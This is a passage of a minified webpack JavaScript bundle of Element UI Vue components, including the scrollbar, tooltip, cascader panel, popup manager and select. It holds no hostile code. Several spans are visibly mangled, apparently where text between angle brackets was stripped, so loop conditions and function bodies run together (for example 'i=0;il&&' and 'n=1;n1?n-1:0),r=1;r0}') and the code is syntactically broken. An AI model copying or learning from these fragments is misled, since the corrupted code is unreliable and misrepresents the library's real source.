0,i=this.wrap;i&&(e=100*i.clientHeight/i.scrollHeight,t=100*i.clientWidth/i.scrollWidth,this.sizeHeight=e<100?e+"%":"",this.sizeWidth=t<100?t+"%":"")}},mounted:function(){this.native||(this.$nextTick(this.update),!this.noresize&&Object(n["addResizeListener"])(this.$refs.resize,this.update))},beforeDestroy:function(){this.native||!this.noresize&&Object(n["removeResizeListener"])(this.$refs.resize,this.update)},install:function(e){e.component(h.name,h)}};t["default"]=h},16:function(e,t){e.exports=i("4010")},2:function(e,t){e.exports=i("5924")},3:function(e,t){e.exports=i("8122")},38:function(e,t){e.exports=i("e62d")}})},"299c":function(e,t,i){e.exports=function(e){var t={};function i(n){if(t[n])return t[n].exports;var s=t[n]={i:n,l:!1,exports:{}};return e[n].call(s.exports,s,s.exports,i),s.l=!0,s.exports}return i.m=e,i.c=t,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},i.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var s in e)i.d(n,s,function(t){return e[t]}.bind(null,s));return n},i.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="/dist/",i(i.s=136)}({136:function(e,t,i){"use strict";i.r(t);var n=i(5),s=i.n(n),r=i(18),a=i.n(r),o=i(2),l=i(3),c=i(7),u=i.n(c),h={name:"ElTooltip",mixins:[s.a],props:{openDelay:{type:Number,default:0},disabled:Boolean,manual:Boolean,effect:{type:String,default:"dark"},arrowOffset:{type:Number,default:0},popperClass:String,content:String,visibleArrow:{default:!0},transition:{type:String,default:"el-fade-in-linear"},popperOptions:{default:function(){return{boundariesPadding:10,gpuAcceleration:!1}}},enterable:{type:Boolean,default:!0},hideAfter:{type:Number,default:0},tabindex:{type:Number,default:0}},data:function(){return{tooltipId:"el-tooltip-"+Object(l["generateId"])(),timeoutPending:null,focusing:!1}},beforeCreate:function(){var e=this;this.$isServer||(this.popperVM=new u.a({data:{node:""},render:function(e){return this.node}}).$mount(),this.debounceClose=a()(200,(function(){return e.handleClosePopper()})))},render:function(e){var t=this;this.popperVM&&(this.popperVM.node=e("transition",{attrs:{name:this.transition},on:{afterLeave:this.doDestroy}},[e("div",{on:{mouseleave:function(){t.setExpectedState(!1),t.debounceClose()},mouseenter:function(){t.setExpectedState(!0)}},ref:"popper",attrs:{role:"tooltip",id:this.tooltipId,"aria-hidden":this.disabled||!this.showPopper?"true":"false"},directives:[{name:"show",value:!this.disabled&&this.showPopper}],class:["el-tooltip__popper","is-"+this.effect,this.popperClass]},[this.$slots.content||this.content])]));var i=this.getFirstElement();if(!i)return null;var n=i.data=i.data||{};return n.staticClass=this.addTooltipClass(n.staticClass),i},mounted:function(){var e=this;this.referenceElm=this.$el,1===this.$el.nodeType&&(this.$el.setAttribute("aria-describedby",this.tooltipId),this.$el.setAttribute("tabindex",this.tabindex),Object(o["on"])(this.referenceElm,"mouseenter",this.show),Object(o["on"])(this.referenceElm,"mouseleave",this.hide),Object(o["on"])(this.referenceElm,"focus",(function(){if(e.$slots.default&&e.$slots.default.length){var t=e.$slots.default[0].componentInstance;t&&t.focus?t.focus():e.handleFocus()}else e.handleFocus()})),Object(o["on"])(this.referenceElm,"blur",this.handleBlur),Object(o["on"])(this.referenceElm,"click",this.removeFocusing)),this.value&&this.popperVM&&this.popperVM.$nextTick((function(){e.value&&e.updatePopper()}))},watch:{focusing:function(e){e?Object(o["addClass"])(this.referenceElm,"focusing"):Object(o["removeClass"])(this.referenceElm,"focusing")}},methods:{show:function(){this.setExpectedState(!0),this.handleShowPopper()},hide:function(){this.setExpectedState(!1),this.debounceClose()},handleFocus:function(){this.focusing=!0,this.show()},handleBlur:function(){this.focusing=!1,this.hide()},removeFocusing:function(){this.focusing=!1},addTooltipClass:function(e){return e?"el-tooltip "+e.replace("el-tooltip",""):"el-tooltip"},handleShowPopper:function(){var e=this;this.expectedState&&!this.manual&&(clearTimeout(this.timeout),this.timeout=setTimeout((function(){e.showPopper=!0}),this.openDelay),this.hideAfter>0&&(this.timeoutPending=setTimeout((function(){e.showPopper=!1}),this.hideAfter)))},handleClosePopper:function(){this.enterable&&this.expectedState||this.manual||(clearTimeout(this.timeout),this.timeoutPending&&clearTimeout(this.timeoutPending),this.showPopper=!1,this.disabled&&this.doDestroy())},setExpectedState:function(e){!1===e&&clearTimeout(this.timeoutPending),this.expectedState=e},getFirstElement:function(){var e=this.$slots.default;if(!Array.isArray(e))return null;for(var t=null,i=0;il&&(e.scrollTop=a-e.clientHeight)}else e.scrollTop=0}},"2bb5":function(e,t,i){"use strict";t.__esModule=!0;i("8122");t.default={mounted:function(){},methods:{getMigratingConfig:function(){return{props:{},events:{}}}}}},4010:function(e,t,i){"use strict";t.__esModule=!0,t.removeResizeListener=t.addResizeListener=void 0;var n=i("6dd8"),s=a(n),r=i("9619");function a(e){return e&&e.__esModule?e:{default:e}}var o="undefined"===typeof window,l=function(e){var t=e,i=Array.isArray(t),n=0;for(t=i?t:t[Symbol.iterator]();;){var s;if(i){if(n>=t.length)break;s=t[n++]}else{if(n=t.next(),n.done)break;s=n.value}var r=s,a=r.target.__resizeListeners__||[];a.length&&a.forEach((function(e){e()}))}};t.addResizeListener=function(e,t){o||(e.__resizeListeners__||(e.__resizeListeners__=[],e.__ro__=new s.default((0,r.debounce)(16,l)),e.__ro__.observe(e)),e.__resizeListeners__.push(t))},t.removeResizeListener=function(e,t){e&&e.__resizeListeners__&&(e.__resizeListeners__.splice(e.__resizeListeners__.indexOf(t),1),e.__resizeListeners__.length||e.__ro__.disconnect())}},"417f":function(e,t,i){"use strict";t.__esModule=!0;var n=i("2b0e"),s=a(n),r=i("5924");function a(e){return e&&e.__esModule?e:{default:e}}var o=[],l="@@clickoutsideContext",c=void 0,u=0;function h(e,t,i){return function(){var n=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},s=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};!(i&&i.context&&n.target&&s.target)||e.contains(n.target)||e.contains(s.target)||e===n.target||i.context.popperElm&&(i.context.popperElm.contains(n.target)||i.context.popperElm.contains(s.target))||(t.expression&&e[l].methodName&&i.context[e[l].methodName]?i.context[e[l].methodName]():e[l].bindingFn&&e[l].bindingFn())}}!s.default.prototype.$isServer&&(0,r.on)(document,"mousedown",(function(e){return c=e})),!s.default.prototype.$isServer&&(0,r.on)(document,"mouseup",(function(e){o.forEach((function(t){return t[l].documentHandler(e,c)}))})),t.default={bind:function(e,t,i){o.push(e);var n=u++;e[l]={id:n,documentHandler:h(e,t,i),methodName:t.expression,bindingFn:t.value}},update:function(e,t,i){e[l].documentHandler=h(e,t,i),e[l].methodName=t.expression,e[l].bindingFn=t.value},unbind:function(e){for(var t=o.length,i=0;i\n \n '}else i||(this.hoverTimer=setTimeout(this.clearHoverZone,this.panel.config.hoverThreshold))},clearHoverZone:function(){var e=this.$refs.hoverZone;e&&(e.innerHTML="")},renderEmptyText:function(e){return e("div",{class:"el-cascader-menu__empty-text"},[this.t("el.cascader.noData")])},renderNodeList:function(e){var t=this.menuId,i=this.panel.isHoverMenu,n={on:{}};i&&(n.on.expand=this.handleExpand);var s=this.nodes.map((function(i,s){var r=i.hasChildren;return e("cascader-node",l()([{key:i.uid,attrs:{node:i,"node-id":t+"-"+s,"aria-haspopup":r,"aria-owns":r?t:null}},n]))}));return[].concat(s,[i?e("svg",{ref:"hoverZone",class:"el-cascader-menu__hover-zone"}):null])}},render:function(e){var t=this.isEmpty,i=this.menuId,n={nativeOn:{}};return this.panel.isHoverMenu&&(n.nativeOn.mousemove=this.handleMouseMove),e("el-scrollbar",l()([{attrs:{tag:"ul",role:"menu",id:i,"wrap-class":"el-cascader-menu__wrap","view-class":{"el-cascader-menu__list":!0,"is-empty":t}},class:"el-cascader-menu"},n]),[t?this.renderEmptyText(e):this.renderNodeList(e)])}},$=D,O=Object(y["a"])($,x,C,!1,null,null,null);O.options.__file="packages/cascader-panel/src/cascader-menu.vue";var E=O.exports,T=i(21),P=function(){function e(e,t){for(var i=0;i1?t-1:0),n=1;n1?n-1:0),r=1;r0},e.prototype.syncCheckState=function(e){var t=this.getValueByOption(),i=this.isSameNode(e,t);this.doCheck(i)},e.prototype.doCheck=function(e){this.checked!==e&&(this.config.checkStrictly?this.checked=e:(this.broadcast("check",e),this.setCheckState(e),this.emit("check")))},P(e,[{key:"isDisabled",get:function(){var e=this.data,t=this.parent,i=this.config,n=i.disabled,s=i.checkStrictly;return e[n]||!s&&t&&t.isDisabled}},{key:"isLeaf",get:function(){var e=this.data,t=this.loaded,i=this.hasChildren,n=this.children,s=this.config,r=s.lazy,a=s.leaf;if(r){var o=Object(T["isDef"])(e[a])?e[a]:!!t&&!n.length;return this.hasChildren=!o,o}return!i}}]),e}(),j=I;function F(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var L=function e(t,i){return t.reduce((function(t,n){return n.isLeaf?t.push(n):(!i&&t.push(n),t=t.concat(e(n.children,i))),t}),[])},A=function(){function e(t,i){F(this,e),this.config=i,this.initNodes(t)}return e.prototype.initNodes=function(e){var t=this;e=Object(m["coerceTruthyValueToArray"])(e),this.nodes=e.map((function(e){return new j(e,t.config)})),this.flattedNodes=this.getFlattedNodes(!1,!1),this.leafNodes=this.getFlattedNodes(!0,!1)},e.prototype.appendNode=function(e,t){var i=new j(e,this.config,t),n=t?t.children:this.nodes;n.push(i)},e.prototype.appendNodes=function(e,t){var i=this;e=Object(m["coerceTruthyValueToArray"])(e),e.forEach((function(e){return i.appendNode(e,t)}))},e.prototype.getNodes=function(){return this.nodes},e.prototype.getFlattedNodes=function(e){var t=!(arguments.length>1&&void 0!==arguments[1])||arguments[1],i=e?this.leafNodes:this.flattedNodes;return t?i:L(this.nodes,e)},e.prototype.getNodeByValue=function(e){var t=this.getFlattedNodes(!1,!this.config.lazy).filter((function(t){return Object(m["valueEquals"])(t.path,e)||t.value===e}));return t&&t.length?t[0]:null},e}(),V=A,B=i(9),z=i.n(B),R=i(40),H=i.n(R),W=i(31),q=i.n(W),Y=Object.assign||function(e){for(var t=1;t0){var l=i.store.getNodeByValue(r);l.data[o]||i.lazyLoad(l,(function(){i.handleExpand(l)})),i.loadCount===i.checkedValue.length&&i.$parent.computePresentText()}}t&&t(n)};n.lazyLoad(e,s)},calculateMultiCheckedValue:function(){this.checkedValue=this.getCheckedNodes(this.leafOnly).map((function(e){return e.getValueByOption()}))},scrollIntoView:function(){if(!this.$isServer){var e=this.$refs.menu||[];e.forEach((function(e){var t=e.$el;if(t){var i=t.querySelector(".el-scrollbar__wrap"),n=t.querySelector(".el-cascader-node.is-active")||t.querySelector(".el-cascader-node.in-active-path");q()(i,n)}}))}},getNodeByValue:function(e){return this.store.getNodeByValue(e)},getFlattedNodes:function(e){var t=!this.config.lazy;return this.store.getFlattedNodes(e,t)},getCheckedNodes:function(e){var t=this.checkedValue,i=this.multiple;if(i){var n=this.getFlattedNodes(e);return n.filter((function(e){return e.checked}))}return this.isEmptyValue(t)?[]:[this.getNodeByValue(t)]},clearCheckedNodes:function(){var e=this.config,t=this.leafOnly,i=e.multiple,n=e.emitPath;i?(this.getCheckedNodes(t).filter((function(e){return!e.isDisabled})).forEach((function(e){return e.doCheck(!1)})),this.calculateMultiCheckedValue()):this.checkedValue=n?[]:null}}},te=ee,ie=Object(y["a"])(te,n,s,!1,null,null,null);ie.options.__file="packages/cascader-panel/src/cascader-panel.vue";var ne=ie.exports;ne.install=function(e){e.component(ne.name,ne)};t["default"]=ne},9:function(e,t){e.exports=i("7f4d")}})},4897:function(e,t,i){"use strict";t.__esModule=!0,t.i18n=t.use=t.t=void 0;var n=i("f0d9"),s=h(n),r=i("2b0e"),a=h(r),o=i("9afc"),l=h(o),c=i("9d7e"),u=h(c);function h(e){return e&&e.__esModule?e:{default:e}}var d=(0,u.default)(a.default),p=s.default,f=!1,m=function(){var e=Object.getPrototypeOf(this||a.default).$t;if("function"===typeof e&&a.default.locale)return f||(f=!0,a.default.locale(a.default.config.lang,(0,l.default)(p,a.default.locale(a.default.config.lang)||{},{clone:!0}))),e.apply(this,arguments)},v=t.t=function(e,t){var i=m.apply(this,arguments);if(null!==i&&void 0!==i)return i;for(var n=e.split("."),s=p,r=0,a=n.length;r0){var n=t[t.length-1];if(n.id===e){if(n.modalClass){var s=n.modalClass.trim().split(/\s+/);s.forEach((function(e){return(0,r.removeClass)(i,e)}))}t.pop(),t.length>0&&(i.style.zIndex=t[t.length-1].zIndex)}else for(var a=t.length-1;a>=0;a--)if(t[a].id===e){t.splice(a,1);break}}0===t.length&&(this.modalFade&&(0,r.addClass)(i,"v-modal-leave"),setTimeout((function(){0===t.length&&(i.parentNode&&i.parentNode.removeChild(i),i.style.display="none",d.modalDom=void 0),(0,r.removeClass)(i,"v-modal-leave")}),200))}};Object.defineProperty(d,"zIndex",{configurable:!0,get:function(){return l||(c=c||(s.default.prototype.$ELEMENT||{}).zIndex||2e3,l=!0),c},set:function(e){c=e}});var p=function(){if(!s.default.prototype.$isServer&&d.modalStack.length>0){var e=d.modalStack[d.modalStack.length-1];if(!e)return;var t=d.getInstance(e.id);return t}};s.default.prototype.$isServer||window.addEventListener("keydown",(function(e){if(27===e.keyCode){var t=p();t&&t.closeOnPressEscape&&(t.handleClose?t.handleClose():t.handleAction?t.handleAction("cancel"):t.close())}})),t.default=d},"4e4b":function(e,t,i){e.exports=function(e){var t={};function i(n){if(t[n])return t[n].exports;var s=t[n]={i:n,l:!1,exports:{}};return e[n].call(s.exports,s,s.exports,i),s.l=!0,s.exports}return i.m=e,i.c=t,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},i.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var s in e)i.d(n,s,function(t){return e[t]}.bind(null,s));return n},i.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="/dist/",i(i.s=61)}({0:function(e,t,i){"use strict";function n(e,t,i,n,s,r,a,o){var l,c="function"===typeof e?e.options:e;if(t&&(c.render=t,c.staticRenderFns=i,c._compiled=!0),n&&(c.functional=!0),r&&(c._scopeId="data-v-"+r),a?(l=function(e){e=e||this.$vnode&&this.$vnode.ssrContext||this.parent&&this.parent.$vnode&&this.parent.$vnode.ssrContext,e||"undefined"===typeof __VUE_SSR_CONTEXT__||(e=__VUE_SSR_CONTEXT__),s&&s.call(this,e),e&&e._registeredComponents&&e._registeredComponents.add(a)},c._ssrRegister=l):s&&(l=o?function(){s.call(this,this.$root.$options.shadowRoot)}:s),l)if(c.functional){c._injectStyles=l;var u=c.render;c.render=function(e,t){return l.call(t),u(e,t)}}else{var h=c.beforeCreate;c.beforeCreate=h?[].concat(h,l):[l]}return{exports:e,options:c}}i.d(t,"a",(function(){return n}))},10:function(e,t){e.exports=i("f3ad")},12:function(e,t){e.exports=i("417f")},15:function(e,t){e.exports=i("14e9")},16:function(e,t){e.exports=i("4010")},18:function(e,t){e.exports=i("0e15")},21:function(e,t){e.exports=i("d397")},22:function(e,t){e.exports=i("12f2")},3:function(e,t){e.exports=i("8122")},31:function(e,t){e.exports=i("2a5e")},33:function(e,t,i){"use strict";var n=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("li",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-select-dropdown__item",class:{selected:e.itemSelected,"is-disabled":e.disabled||e.groupDisabled||e.limitReached,hover:e.hover},on:{mouseenter:e.hoverItem,click:function(t){return t.stopPropagation(),e.selectOptionClick(t)}}},[e._t("default",[i("span",[e._v(e._s(e.currentLabel))])])],2)},s=[];n._withStripped=!0;var r=i(4),a=i.n(r),o=i(3),l="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},c={mixins:[a.a],name:"ElOption",componentName:"ElOption",inject:["select"],props:{value:{required:!0},label:[String,Number],created:Boolean,disabled:{type:Boolean,default:!1}},data:function(){return{index:-1,groupDisabled:!1,visible:!0,hitState:!1,hover:!1}},computed:{isObject:function(){return"[object object]"===Object.prototype.toString.call(this.value).toLowerCase()},currentLabel:function(){return this.label||(this.isObject?"":this.value)},currentValue:function(){return this.value||this.label||""},itemSelected:function(){return this.select.multiple?this.contains(this.select.value,this.value):this.isEqual(this.value,this.select.value)},limitReached:function(){return!!this.select.multiple&&(!this.itemSelected&&(this.select.value||[]).length>=this.select.multipleLimit&&this.select.multipleLimit>0)}},watch:{currentLabel:function(){this.created||this.select.remote||this.dispatch("ElSelect","setSelected")},value:function(e,t){var i=this.select,n=i.remote,s=i.valueKey;if(!this.created&&!n){if(s&&"object"===("undefined"===typeof e?"undefined":l(e))&&"object"===("undefined"===typeof t?"undefined":l(t))&&e[s]===t[s])return;this.dispatch("ElSelect","setSelected")}}},methods:{isEqual:function(e,t){if(this.isObject){var i=this.select.valueKey;return Object(o["getValueByPath"])(e,i)===Object(o["getValueByPath"])(t,i)}return e===t},contains:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],t=arguments[1];if(this.isObject){var i=this.select.valueKey;return e&&e.some((function(e){return Object(o["getValueByPath"])(e,i)===Object(o["getValueByPath"])(t,i)}))}return e&&e.indexOf(t)>-1},handleGroupDisabled:function(e){this.groupDisabled=e},hoverItem:function(){this.disabled||this.groupDisabled||(this.select.hoverIndex=this.select.options.indexOf(this))},selectOptionClick:function(){!0!==this.disabled&&!0!==this.groupDisabled&&this.dispatch("ElSelect","handleOptionClick",[this,!0])},queryChange:function(e){this.visible=new RegExp(Object(o["escapeRegexpString"])(e),"i").test(this.currentLabel)||this.created,this.visible||this.select.filteredOptionsCount--}},created:function(){this.select.options.push(this),this.select.cachedOptions.push(this),this.select.optionsCount++,this.select.filteredOptionsCount++,this.$on("queryChange",this.queryChange),this.$on("handleGroupDisabled",this.handleGroupDisabled)},beforeDestroy:function(){var e=this.select,t=e.selected,i=e.multiple,n=i?t:[t],s=this.select.cachedOptions.indexOf(this),r=n.indexOf(this);s>-1&&r<0&&this.select.cachedOptions.splice(s,1),this.select.onOptionDestroy(this.select.options.indexOf(this))}},u=c,h=i(0),d=Object(h["a"])(u,n,s,!1,null,null,null);d.options.__file="packages/select/src/option.vue";t["a"]=d.exports},37:function(e,t){e.exports=i("8bbc")},4:function(e,t){e.exports=i("d010")},5:function(e,t){e.exports=i("e974")},6:function(e,t){e.exports=i("6b7c")},61:function(e,t,i){"use strict";i.r(t);var n=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleClose,expression:"handleClose"}],staticClass:"el-select",class:[e.selectSize?"el-select--"+e.selectSize:""],on:{click:function(t){return t.stopPropagation(),e.toggleMenu(t)}}},[e.multiple?i("div",{ref:"tags",staticClass:"el-select__tags",style:{"max-width":e.inputWidth-32+"px",width:"100%"}},[e.collapseTags&&e.selected.length?i("span",[i("el-tag",{attrs:{closable:!e.selectDisabled,size:e.collapseTagSize,hit:e.selected[0].hitState,type:"info","disable-transitions":""},on:{close:function(t){e.deleteTag(t,e.selected[0])}}},[i("span",{staticClass:"el-select__tags-text"},[e._v(e._s(e.selected[0].currentLabel))])]),e.selected.length>1?i("el-tag",{attrs:{closable:!1,size:e.collapseTagSize,type:"info","disable-transitions":""}},[i("span",{staticClass:"el-select__tags-text"},[e._v("+ "+e._s(e.selected.length-1))])]):e._e()],1):e._e(),e.collapseTags?e._e():i("transition-group",{on:{"after-leave":e.resetInputHeight}},e._l(e.selected,(function(t){return i("el-tag",{key:e.getValueKey(t),attrs:{closable:!e.selectDisabled,size:e.collapseTagSize,hit:t.hitState,type:"info","disable-transitions":""},on:{close:function(i){e.deleteTag(i,t)}}},[i("span",{staticClass:"el-select__tags-text"},[e._v(e._s(t.currentLabel))])])})),1),e.filterable?i("input",{directives:[{name:"model",rawName:"v-model",value:e.query,expression:"query"}],ref:"input",staticClass:"el-select__input",class:[e.selectSize?"is-"+e.selectSize:""],style:{"flex-grow":"1",width:e.inputLength/(e.inputWidth-32)+"%","max-width":e.inputWidth-42+"px"},attrs:{type:"text",disabled:e.selectDisabled,autocomplete:e.autoComplete||e.autocomplete},domProps:{value:e.query},on:{focus:e.handleFocus,blur:function(t){e.softFocus=!1},keyup:e.managePlaceholder,keydown:[e.resetInputState,function(t){if(!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"]))return null;t.preventDefault(),e.handleNavigate("next")},function(t){if(!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"]))return null;t.preventDefault(),e.handleNavigate("prev")},function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:(t.preventDefault(),e.selectOption(t))},function(t){if(!("button"in t)&&e._k(t.keyCode,"esc",27,t.key,["Esc","Escape"]))return null;t.stopPropagation(),t.preventDefault(),e.visible=!1},function(t){return!("button"in t)&&e._k(t.keyCode,"delete",[8,46],t.key,["Backspace","Delete","Del"])?null:e.deletePrevTag(t)},function(t){if(!("button"in t)&&e._k(t.keyCode,"tab",9,t.key,"Tab"))return null;e.visible=!1}],compositionstart:e.handleComposition,compositionupdate:e.handleComposition,compositionend:e.handleComposition,input:[function(t){t.target.composing||(e.query=t.target.value)},e.debouncedQueryChange]}}):e._e()],1):e._e(),i("el-input",{ref:"reference",class:{"is-focus":e.visible},attrs:{type:"text",placeholder:e.currentPlaceholder,name:e.name,id:e.id,autocomplete:e.autoComplete||e.autocomplete,size:e.selectSize,disabled:e.selectDisabled,readonly:e.readonly,"validate-event":!1,tabindex:e.multiple&&e.filterable?"-1":null},on:{focus:e.handleFocus,blur:e.handleBlur,input:e.debouncedOnInputChange,compositionstart:e.handleComposition,compositionupdate:e.handleComposition,compositionend:e.handleComposition},nativeOn:{keydown:[function(t){if(!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"]))return null;t.stopPropagation(),t.preventDefault(),e.handleNavigate("next")},function(t){if(!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"]))return null;t.stopPropagation(),t.preventDefault(),e.handleNavigate("prev")},function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:(t.preventDefault(),e.selectOption(t))},function(t){if(!("button"in t)&&e._k(t.keyCode,"esc",27,t.key,["Esc","Escape"]))return null;t.stopPropagation(),t.preventDefault(),e.visible=!1},function(t){if(!("button"in t)&&e._k(t.keyCode,"tab",9,t.key,"Tab"))return null;e.visible=!1}],mouseenter:function(t){e.inputHovering=!0},mouseleave:function(t){e.inputHovering=!1}},model:{value:e.selectedLabel,callback:function(t){e.selectedLabel=t},expression:"selectedLabel"}},[e.$slots.prefix?i("template",{slot:"prefix"},[e._t("prefix")],2):e._e(),i("template",{slot:"suffix"},[i("i",{directives:[{name:"show",rawName:"v-show",value:!e.showClose,expression:"!showClose"}],class:["el-select__caret","el-input__icon","el-icon-"+e.iconClass]}),e.showClose?i("i",{staticClass:"el-select__caret el-input__icon el-icon-circle-close",on:{click:e.handleClearClick}}):e._e()])],2),i("transition",{attrs:{name:"el-zoom-in-top"},on:{"before-enter":e.handleMenuEnter,"after-leave":e.doDestroy}},[i("el-select-menu",{directives:[{name:"show",rawName:"v-show",value:e.visible&&!1!==e.emptyText,expression:"visible && emptyText !== false"}],ref:"popper",attrs:{"append-to-body":e.popperAppendToBody}},[i("el-scrollbar",{directives:[{name:"show",rawName:"v-show",value:e.options.length>0&&!e.loading,expression:"options.length > 0 && !loading"}],ref:"scrollbar",class:{"is-empty":!e.allowCreate&&e.query&&0===e.filteredOptionsCount},attrs:{tag:"ul","wrap-class":"el-select-dropdown__wrap","view-class":"el-select-dropdown__list"}},[e.showNewOption?i("el-option",{attrs:{value:e.query,created:""}}):e._e(),e._t("default")],2),e.emptyText&&(!e.allowCreate||e.loading||e.allowCreate&&0===e.options.length)?[e.$slots.empty?e._t("empty"):i("p",{staticClass:"el-select-dropdown__empty"},[e._v("\n "+e._s(e.emptyText)+"\n ")])]:e._e()],2)],1)],1)},s=[];n._withStripped=!0;var r=i(4),a=i.n(r),o=i(22),l=i.n(o),c=i(6),u=i.n(c),h=i(10),d=i.n(h),p=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-select-dropdown el-popper",class:[{"is-multiple":e.$parent.multiple},e.popperClass],style:{minWidth:e.minWidth}},[e._t("default")],2)},f=[];p._withStripped=!0;var m=i(5),v=i.n(m),g={name:"ElSelectDropdown",componentName:"ElSelectDropdown",mixins:[v.a],props:{placement:{default:"bottom-start"},boundariesPadding:{default:0},popperOptions:{default:function(){return{gpuAcceleration:!1}}},visibleArrow:{default:!0},appendToBody:{type:Boolean,default:!0}},data:function(){return{minWidth:""}},computed:{popperClass:function(){return this.$parent.popperClass}},watch:{"$parent.inputWidth":function(){this.minWidth=this.$parent.$el.getBoundingClientRect().width+"px"}},mounted:function(){var e=this;this.referenceElm=this.$parent.$refs.reference.$el,this.$parent.popperElm=this.popperElm=this.$el,this.$on("updatePopper",(function(){e.$parent.visible&&e.updatePopper()})),this.$on("destroyPopper",this.destroyPopper)}},b=g,y=i(0),_=Object(y["a"])(b,p,f,!1,null,null,null);_.options.__file="packages/select/src/select-dropdown.vue";var x=_.exports,C=i(33),w=i(37),k=i.n(w),S=i(15),D=i.n(S),$=i(18),O=i.n($),E=i(12),T=i.n(E),P=i(16),M=i(31),N=i.n(M),I=i(3),j={data:function(){return{hoverOption:-1}},computed:{optionsAllDisabled:function(){return this.options.filter((function(e){return e.visible})).every((function(e){return e.disabled}))}},watch:{hoverIndex:function(e){var t=this;"number"===typeof e&&e>-1&&(this.hoverOption=this.options[e]||{}),this.options.forEach((function(e){e.hover=t.hoverOption===e}))}},methods:{navigateOptions:function(e){var t=this;if(this.visible){if(0!==this.options.length&&0!==this.filteredOptionsCount&&!this.optionsAllDisabled){"next"===e?(this.hoverIndex++,this.hoverIndex===this.options.length&&(this.hoverIndex=0)):"prev"===e&&(this.hoverIndex--,this.hoverIndex<0&&(this.hoverIndex=this.options.length-1));var i=this.options[this.hoverIndex];!0!==i.disabled&&!0!==i.groupDisabled&&i.visible||this.navigateOptions(e),this.$nextTick((function(){return t.scrollToOption(t.hoverOption)}))}}else this.visible=!0}}},F=i(21),L={mixins:[a.a,u.a,l()("reference"),j],name:"ElSelect",componentName:"ElSelect",inject:{elForm:{default:""},elFormItem:{default:""}},provide:function(){return{select:this}},computed:{_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},readonly:function(){return!this.filterable||this.multiple||!Object(I["isIE"])()&&!Object(I["isEdge"])()&&!this.visible},showClose:function(){var e=this.multiple?Array.isArray(this.value)&&this.value.length>0:void 0!==this.value&&null!==this.value&&""!==this.value,t=this.clearable&&!this.selectDisabled&&this.inputHovering&&e;return t},iconClass:function(){return this.remote&&this.filterable?"":this.visible?"arrow-up is-reverse":"arrow-up"},debounce:function(){return this.remote?300:0},emptyText:function(){return this.loading?this.loadingText||this.t("el.select.loading"):(!this.remote||""!==this.query||0!==this.options.length)&&(this.filterable&&this.query&&this.options.length>0&&0===this.filteredOptionsCount?this.noMatchText||this.t("el.select.noMatch"):0===this.options.length?this.noDataText||this.t("el.select.noData"):null)},showNewOption:function(){var e=this,t=this.options.filter((function(e){return!e.created})).some((function(t){return t.currentLabel===e.query}));return this.filterable&&this.allowCreate&&""!==this.query&&!t},selectSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size},selectDisabled:function(){return this.disabled||(this.elForm||{}).disabled},collapseTagSize:function(){return["small","mini"].indexOf(this.selectSize)>-1?"mini":"small"},propPlaceholder:function(){return"undefined"!==typeof this.placeholder?this.placeholder:this.t("el.select.placeholder")}},components:{ElInput:d.a,ElSelectMenu:x,ElOption:C["a"],ElTag:k.a,ElScrollbar:D.a},directives:{Clickoutside:T.a},props:{name:String,id:String,value:{required:!0},autocomplete:{type:String,default:"off"},autoComplete:{type:String,validator:function(e){return!0}},automaticDropdown:Boolean,size:String,disabled:Boolean,clearable:Boolean,filterable:Boolean,allowCreate:Boolean,loading:Boolean,popperClass:String,remote:Boolean,loadingText:String,noMatchText:String,noDataText:String,remoteMethod:Function,filterMethod:Function,multiple:Boolean,multipleLimit:{type:Number,default:0},placeholder:{type:String,required:!1},defaultFirstOption:Boolean,reserveKeyword:Boolean,valueKey:{type:String,default:"value"},collapseTags:Boolean,popperAppendToBody:{type:Boolean,default:!0}},data:function(){return{options:[],cachedOptions:[],createdLabel:null,createdSelected:!1,selected:this.multiple?[]:{},inputLength:20,inputWidth:0,initialInputHeight:0,cachedPlaceHolder:"",optionsCount:0,filteredOptionsCount:0,visible:!1,softFocus:!1,selectedLabel:"",hoverI